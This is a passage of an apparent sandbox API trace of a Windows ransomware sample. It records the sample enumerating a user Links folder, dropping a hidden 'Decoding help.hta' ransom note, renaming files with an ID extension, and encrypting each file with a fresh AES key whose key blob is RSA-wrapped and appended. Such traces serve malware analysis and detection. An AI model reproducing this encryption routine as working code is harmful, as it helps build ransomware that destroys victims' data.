lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0055.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0055.298] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1000fd30 | out: lpFindFileData=0x1000fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 0 [0055.298] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 210 os_tid = 0x82c [0040.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*.*", lpFindFileData=0x1014fd30 | out: lpFindFileData=0x1014fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db3b8 [0042.260] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.260] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x1014fd30 | out: lpFindFileData=0x1014fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.260] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.260] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.260] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x1014fd30 | out: lpFindFileData=0x1014fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.260] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.260] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.260] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" [0042.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" (normalized: "c:\\users\\default\\links\\decoding help.hta")) returned 0xffffffff [0042.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" (normalized: "c:\\users\\default\\links\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c0 [0042.535] WriteFile (in: hFile=0x6c0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1014fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.535] CloseHandle (hObject=0x6c0) returned 1 [0042.536] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.822] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0042.822] lstrlenW (lpString="desktop.ini") returned 11 [0042.822] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.822] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" [0042.822] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" [0042.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0042.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0042.869] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6a4 [0042.869] CryptAcquireContextA (in: phProv=0x1014fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1014fcec*=0x3448c70) returned 1 [0042.870] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1014fce8 | out: phKey=0x1014fce8*=0x6715f0) returned 1 [0042.870] CryptExportKey (in: hKey=0x6715f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1014fbe4, pdwDataLen=0x1014fce4 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fce4*=0x2c) returned 1 [0042.870] MapViewOfFile (hFileMappingObject=0x6a4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x240) returned 0x8b90000 [0042.887] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x100) returned 1 [0042.888] CryptEncrypt (in: hKey=0x6715f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000*, pdwDataLen=0x1014fce4*=0x240, dwBufLen=0x240 | out: pbData=0x8b90000*, pdwDataLen=0x1014fce4*=0x240) returned 1 [0042.888] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0042.889] CloseHandle (hObject=0x6a4) returned 1 [0042.889] CryptDestroyKey (hKey=0x6715f0) returned 1 [0042.889] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0042.889] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.889] WriteFile (in: hFile=0x6a0, lpBuffer=0x1014fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1014fbe4*, lpNumberOfBytesWritten=0x1014fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.890] WriteFile (in: hFile=0x6a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1014fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.890] CloseHandle (hObject=0x6a0) returned 1 [0042.891] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.891] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x1014fd30 | out: lpFindFileData=0x1014fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0042.891] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.892] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.892] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" [0042.892] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" (normalized: "c:\\users\\default\\links\\decoding help.hta")) returned 0x1 [0042.892] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Desktop.lnk") returned -1 [0042.892] lstrlenW (lpString="Desktop.lnk") returned 11 [0042.892] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.892] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.892] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="Desktop.lnk" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" [0042.892] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" [0042.892] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]" [0042.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\desktop.lnk.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\desktop.lnk.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0042.893] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6a4 [0042.893] CryptAcquireContextA (in: phProv=0x1014fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1014fcec*=0x3448c70) returned 1 [0042.894] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1014fce8 | out: phKey=0x1014fce8*=0x6716f0) returned 1 [0042.894] CryptExportKey (in: hKey=0x6716f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1014fbe4, pdwDataLen=0x1014fce4 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fce4*=0x2c) returned 1 [0042.894] MapViewOfFile (hFileMappingObject=0x6a4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c0) returned 0x8b90000 [0042.896] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x100) returned 1 [0042.896] CryptEncrypt (in: hKey=0x6716f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000*, pdwDataLen=0x1014fce4*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x8b90000*, pdwDataLen=0x1014fce4*=0x1c0) returned 1 [0042.896] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0042.897] CloseHandle (hObject=0x6a4) returned 1 [0042.897] CryptDestroyKey (hKey=0x6716f0) returned 1 [0042.897] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0042.897] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.897] WriteFile (in: hFile=0x6a0, lpBuffer=0x1014fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1014fbe4*, lpNumberOfBytesWritten=0x1014fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.898] WriteFile (in: hFile=0x6a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1014fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.898] CloseHandle (hObject=0x6a0) returned 1 [0042.899] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.899] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x1014fd30 | out: lpFindFileData=0x1014fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0042.899] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.899] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.899] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" [0042.899] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" (normalized: "c:\\users\\default\\links\\decoding help.hta")) returned 0x1 [0042.900] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Downloads.lnk") returned -1 [0042.900] lstrlenW (lpString="Downloads.lnk") returned 13 [0042.900] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.900] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="Downloads.lnk" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" [0042.900] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" [0042.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]" [0042.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\downloads.lnk.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\downloads.lnk.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0042.901] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6a4 [0042.901] CryptAcquireContextA (in: phProv=0x1014fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1014fcec*=0x3448c70) returned 1 [0042.901] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1014fce8 | out: phKey=0x1014fce8*=0x6715f0) returned 1 [0042.901] CryptExportKey (in: hKey=0x6715f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1014fbe4, pdwDataLen=0x1014fce4 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fce4*=0x2c) returned 1 [0042.901] MapViewOfFile (hFileMappingObject=0x6a4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x8b90000 [0042.925] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x100) returned 1 [0042.925] CryptEncrypt (in: hKey=0x6715f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000*, pdwDataLen=0x1014fce4*=0x360, dwBufLen=0x360 | out: pbData=0x8b90000*, pdwDataLen=0x1014fce4*=0x360) returned 1 [0042.925] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0042.927] CloseHandle (hObject=0x6a4) returned 1 [0042.927] CryptDestroyKey (hKey=0x6715f0) returned 1 [0042.927] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0042.927] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.927] WriteFile (in: hFile=0x6a0, lpBuffer=0x1014fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1014fbe4*, lpNumberOfBytesWritten=0x1014fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.928] WriteFile (in: hFile=0x6a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1014fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.928] CloseHandle (hObject=0x6a0) returned 1 [0042.929] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.929] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0x1014fd30 | out: lpFindFileData=0x1014fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0042.929] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.929] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.929] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" [0042.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Decoding help.hta" (normalized: "c:\\users\\default\\links\\decoding help.hta")) returned 0x1 [0042.929] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RecentPlaces.lnk") returned -1 [0042.929] lstrlenW (lpString="RecentPlaces.lnk") returned 16 [0042.929] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0042.929] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned 30 [0042.929] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\", lpString2="RecentPlaces.lnk" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" [0042.929] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" [0042.929] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]" [0042.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0042.947] CreateFileMappingA (hFile=0x6f0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x704 [0042.947] CryptAcquireContextA (in: phProv=0x1014fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1014fcec*=0x3448c70) returned 1 [0042.948] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1014fce8 | out: phKey=0x1014fce8*=0x6715f0) returned 1 [0042.948] CryptExportKey (in: hKey=0x6715f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1014fbe4, pdwDataLen=0x1014fce4 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fce4*=0x2c) returned 1 [0042.948] MapViewOfFile (hFileMappingObject=0x704, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160) returned 0x8ba0000 [0042.950] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1014fbe4*, pdwDataLen=0x1014fcf8*=0x100) returned 1 [0042.950] CryptEncrypt (in: hKey=0x6715f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8ba0000*, pdwDataLen=0x1014fce4*=0x160, dwBufLen=0x160 | out: pbData=0x8ba0000*, pdwDataLen=0x1014fce4*=0x160) returned 1 [0042.950] UnmapViewOfFile (lpBaseAddress=0x8ba0000) returned 1 [0042.952] CloseHandle (hObject=0x704) returned 1 [0042.952] CryptDestroyKey (hKey=0x6715f0) returned 1 [0042.952] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0042.952] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.952] WriteFile (in: hFile=0x6f0, lpBuffer=0x1014fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1014fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1014fbe4*, lpNumberOfBytesWritten=0x1014fcf8*=0x100, 